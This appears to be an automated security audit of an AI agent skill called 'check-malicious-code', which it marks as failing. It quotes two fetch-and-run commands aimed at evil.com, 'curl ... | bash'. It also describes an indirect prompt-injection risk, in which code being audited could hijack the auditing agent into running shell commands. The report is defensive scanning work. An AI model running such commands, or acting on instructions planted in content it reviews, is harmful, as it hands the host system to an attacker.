check-malicious-code
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION] (CRITICAL): Automated scanning detected 'curl https://evil.com/script.sh | bash' and 'curl https://evil.com/data | bash' within the skill context. These commands execute remote shell scripts without any verification, granting full host access to an external attacker.
- [COMMAND_EXECUTION] (CRITICAL): The skill uses piped shell execution patterns, allowing for arbitrary command delivery from remote servers. This is a severe security violation for any AI agent tool.
- [EXTERNAL_DOWNLOADS] (CRITICAL): The skill attempts to fetch and execute content from 'evil.com', which is an untrusted source not included in the Trusted External Sources list.
- [DATA_EXFILTRATION] (HIGH): The pattern of retrieving data and piping it to a shell interpreter is a common method for exfiltrating system context, credentials, and environment variables during an attack.
- [PROMPT_INJECTION] (HIGH): This tool's primary purpose—auditing other code—creates a massive indirect prompt injection surface. Because it possesses shell execution capabilities, malicious code being audited could exploit the auditor to execute instructions in the host environment.
Recommendations
- CRITICAL: Downloads and executes remote code from untrusted source(s): https://evil.com/data, https://evil.com/script.sh - DO NOT USE
- AI detected serious security threats
Audit Metadata